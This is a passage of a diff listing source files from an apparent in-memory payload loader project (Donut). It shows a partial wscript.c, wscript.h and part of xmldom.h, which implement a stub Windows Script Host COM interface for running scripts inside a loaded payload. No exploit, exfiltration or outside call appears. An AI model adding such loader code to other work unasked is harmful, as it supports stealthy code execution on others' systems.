13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34
35 // IUnknown interface
36 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
37 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
38 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
39
40 // IDispatch interface
41 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
42 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
43 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
44 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
45
46 // IHost interface
47 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
48 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
49 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
50 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
51 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
52 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
53 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
54 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
55 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
56 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
57 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
58 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
59 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
60 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
61 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
62 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
63 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
64 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
65 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
66 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
67 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
68 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
69 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
70
71 host->m_cRef = 0;
72 host->inst = inst;
73
74 DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
75 hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
76
77 if(hr == S_OK) {
78 DPRINT("ITypeLib::GetTypeInfoOfGuid");
79
80 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
81 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
82 }
83 DPRINT("HRESULT : %08lx", hr);
84 return hr;
85 }
86
87 // Queries a COM object for a pointer to one of its interface.
88 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
89 DPRINT("WScript::QueryInterface");
90
91 if(ppv == NULL) return E_POINTER;
92
93 // we implement the following interfaces
94 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
95 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
96 IsEqualIID(&iface->inst->xIID_IHost, riid))
97 {
98 *ppv = iface;
99 return S_OK;
100 }
101 *ppv = NULL;
102 return E_NOINTERFACE;
103 }
104
105 // Increments the reference count for an interface pointer to a COM object.
106 static ULONG WINAPI Host_AddRef(IHost *iface) {
107 DPRINT("WScript::AddRef");
108
109 _InterlockedIncrement(&iface->m_cRef);
110 return iface->m_cRef;
111 }
112
113 // Decrements the reference count for an interface on a COM object.
114 static ULONG WINAPI Host_Release(IHost *iface) {
115 DPRINT("WScript::Release");
116
117 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
118 return ref;
119 }
120
121 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
122 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
123 DPRINT("WScript::GetTypeInfoCount");
124
125 if(pctinfo == NULL) return E_POINTER;
126
127 *pctinfo = 1;
128 return S_OK;
129 }
130
131 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
132 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
133 DPRINT("WScript::GetTypeInfo");
134
135 if(ppTInfo == NULL) return E_POINTER;
136
137 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
138 *ppTInfo = iface->lpTypeInfo;
139
140 return S_OK;
141 }
142
143 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
144 // which can be used on subsequent calls to Invoke.
145 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
146 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
147 DPRINT("WScript::GetIDsOfNames");
148
149 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
150 }
151
152 // Provides access to properties and methods exposed by an object.
153 // The dispatch function DispInvoke provides a standard implementation of Invoke.
154 static HRESULT WINAPI Host_Invoke(
155 IHost *iface, DISPID dispIdMember, REFIID riid,
156 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
157 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
158
159 DPRINT("WScript::Invoke");
160
161 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
162 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
163 pVarResult, pExcepInfo, puArgErr);
164
165 DPRINT("HRESULT : %08lx", hr);
166
167 return hr;
168 }
169
170 // Returns the name of the WScript object (the host executable file).
171 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
172 DPRINT("WScript::Name");
173
174 return S_OK;
175 }
176
177 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
178 DPRINT("WScript::Application");
179
180 return E_NOTIMPL;
181 }
182
183 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
184 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
185 DPRINT("WScript::FullName");
186
187 return E_NOTIMPL;
188 }
189
190 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
191 DPRINT("WScript::Path");
192
193 return E_NOTIMPL;
194 }
195
196 // Gets the script mode, or identifies the script mode.
197 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
198 DPRINT("WScript::get_Interactive");
199
200 return E_NOTIMPL;
201 }
202
203 // Sets the script mode, or identifies the script mode.
204 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
205 DPRINT("WScript::put_Interactive");
206
207 return E_NOTIMPL;
208 }
209
210 // Forces script execution to stop at any time.
211 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
212 DPRINT("WScript::Quit(%i)", ExitCode);
213
214 // if you know of a better way to do this..let me know.
215 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
216
217 return S_OK;
218 }
219
220 // Returns the file name of the currently running script.
221 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
222 DPRINT("WScript::ScriptName");
223
224 return E_NOTIMPL;
225 }
226
227 // Returns the full path of the currently running script.
228 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
229 DPRINT("WScript::ScriptFullName");
230
231 return E_NOTIMPL;
232 }
233
234 // Returns the WshArguments object (a collection of arguments).
235 static HRESULT WINAPI Host_get_Arguments(
236 IHost *iface, void **out_Arguments) { // IArguments2
237 DPRINT("WScript::Arguments");
238
239 return E_NOTIMPL;
240 }
241
242 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
243 DPRINT("WScript::Version");
244
245 return E_NOTIMPL;
246 }
247
248 // Returns the Windows Script Host build version number.
249 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
250 DPRINT("WScript::BuildVersion");
251
252 return E_NOTIMPL;
253 }
254
255 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
256 DPRINT("WScript::get_Timeout");
257
258 return E_NOTIMPL;
259 }
260
261 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
262 DPRINT("WScript::put_Timeout");
263
264 return E_NOTIMPL;
265 }
266
267 // Connects the object's event sources to functions with a given prefix.
268 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
269 IDispatch **out_Dispatch) {
270 DPRINT("WScript::CreateObject");
271
272 return E_NOTIMPL;
273 }
274
275 // Outputs text to either a message box or the command console window.
276 static HRESULT WINAPI Host_Echo(
277 IHost *iface, SAFEARRAY *args) {
278 DPRINT("WScript::Echo");
279
280 return E_NOTIMPL;
281 }
282
283 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
284 static HRESULT WINAPI Host_GetObject(
285 IHost *iface, BSTR Pathname, BSTR ProgID,
286 BSTR Prefix, IDispatch **out_Dispatch) {
287 DPRINT("WScript::GetObject");
288
289 return E_NOTIMPL;
290 }
291
292 // Disconnects a connected object's event sources.
293 static HRESULT WINAPI Host_DisconnectObject(
294 IHost *iface, IDispatch *Object) {
295 DPRINT("WScript::DisconnectObject");
296
297 return E_NOTIMPL;
298 }
299
300 // Suspends script execution for a specified length of time, then continues execution.
301 static HRESULT WINAPI Host_Sleep(
302 IHost *iface, LONG Time) {
303
304 DPRINT("WScript::Sleep");
305 iface->inst->api.Sleep((DWORD)Time);
306
307 return S_OK;
308 }
309
310 // Connects the object's event sources to functions with a given prefix.
311 static HRESULT WINAPI Host_ConnectObject(
312 IHost *iface, IDispatch *Object, BSTR Prefix) {
313 DPRINT("WScript::ConnectObject");
314
315 return E_NOTIMPL;
316 }
317
318 // Exposes the read-only input stream for the current script.
319 static HRESULT WINAPI Host_get_StdIn(
320 IHost *iface, void **ppts) { // ppts is ITextStream
321 DPRINT("WScript::StdIn");
322
323 return E_NOTIMPL;
324 }
325
326 // Exposes the write-only output stream for the current script.
327 static HRESULT WINAPI Host_get_StdOut(
328 IHost *iface, void **ppts) { // ppts is ITextStream
329 DPRINT("WScript::StdOut");
330
331 return E_NOTIMPL;
332 }
333
334 // Exposes the write-only error output stream for the current script.
335 static HRESULT WINAPI Host_get_StdErr(
336 IHost *iface, void **ppts) { // ppts is ITextStream
337 DPRINT("WScript::StdErr");
338
339 return E_NOTIMPL;
340 }
+284
-0
payload/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+588
-0
payload/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
